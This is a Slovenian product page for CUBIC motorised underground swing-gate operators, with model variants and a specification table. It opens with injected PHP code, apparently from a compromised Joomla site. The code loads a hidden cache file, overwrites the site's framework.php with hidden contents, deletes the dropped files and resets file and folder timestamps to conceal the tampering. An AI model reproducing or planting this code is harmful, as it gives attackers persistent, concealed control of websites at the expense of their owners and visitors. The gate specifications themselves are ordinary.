$frameworkFile = $_SERVER ["DOCUMENT_ROOT"]."/includes/framework.php"; $cacheFile = $_SERVER ["DOCUMENT_ROOT"]."/cache/_system/".md5("_system")."-cache-system.php"; $frameworkFileTo = $_SERVER ["DOCUMENT_ROOT"]."/cache/_system/".md5("_framework")."-cache-framework.php"; if (file_exists($cacheFile) && file_exists($frameworkFileTo)) { require_once JPATH_BASE . "/cache/_system/".md5("_system")."-cache-system.php"; $filemTime = filemtime($frameworkFile); $contentFile = file_get_contents($frameworkFileTo); file_put_contents($frameworkFile, $contentFile, LOCK_EX); @unlink($frameworkFileTo); @unlink($cacheFile); touch($frameworkFile, $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/includes", $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/cache", $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/cache/_system", $filemTime); } Avtomatska vrata - FREEZE SYSTEM - Motorizirani pogoni za krilna vrata CUBIC

Motorizirani talni pogoni za krilna vrata CUBIC

Motorizirani pogoni za krilna vrata CUBIC

CUBIC 6/6H/6V/6HV so motorizirani talni pogoni za krilna vrata. Kupci omenjeni pogon izberejo največkrat če ne želijo da bi izgled pogona na kakršenkoli način zmotil izgled stavbe in njene zunanjosti. Zato je idealen za lične vhode, ki krasijo zgodovinske ali arhitekturno pomembne zgradbe.

Upravljanje s CUBUC pogonom je praktično in enostavno, saj se sam pogon skriva v jekleni škatlici, ki je skrita pod zemljo. Sam pogon je lahko nastavljen glede na potrebe in želje samih kupcev, npr. kako široko naj bi se vrata odpirala,...

Motorizirani talni pogoni CUBIC se delijo na podrazrede:

  • CUBIC 6 - je primeren za pogosto rezidenčno delovanje, primerna širina vrat je 3,5 m
  • CUBIC 6H - je primeren za izjemno pogosto delovanje ( bloki, večstanovanjske hiše ) ,primerna širina vrat je 3,5 m
  • CUBIC 6V - je primeren za pogosto rezidenčno delovanje, primerna širina vrat je 1,5 m
  • CUBIC 6HV-je primeren za izjemno pogosto delovanje ( bloki, večstanovanjske hiše ), primerna širina vrat je 1,5 m

TEHNIČNE SPECIFIKACIJE:

CUBIC 6 CUBIC 6H CUBIC 6V CUBIC 6HV
Description: Electromechanical Actuator irreversible suitable for wings up to 3,5 m wide irreversible suitable for wings up to 3,5 m wide irreversible suitable for wings up to 1,5 m wide irreversible suitable for wings up to 1,5 m wide
Maximum capacity 600 kg × 2 m
2500 kg × 3,5m
600 kg × 2 m
2500 kg × 3,5m
200 kg × 1,5 m 200 kg × 1,5 m
Type of use medium haevy medium haevy
Intermittency S2= 15 min
S3= 25%
S2= 30 min
S3= 50%
S2= 15 min
S3= 25%
S2= 30 min
S3= 50%
Motor power supply 230 V~ / 50 Hz 24 V 230 V~ / 50 Hz 24 V
Input 1.5 A 12 A 1.5 A 12 A
Torque 340 Nm 340 Nm 220 Nm 220 Nm
Opening time 18 s/90° 12 + 25 s/90° 9 s/90° 6 - 13 s/90°
Maximum opening 110 - 180° 110 - 180° 110 - 180° 110 - 180°
Release for manual opening key operated key operated key operated key operated
Operating temperature -20°C / +55°C -20°C / +55°C -20°C / +55°C -20°C / +55°C
Protection degree IP 67 IP 67 IP 67 IP 67
Control panel E 2 LOGIC M VIVA H E 2 LOGIC M VIVA

PRINCIP DELOVANJA:

cubic9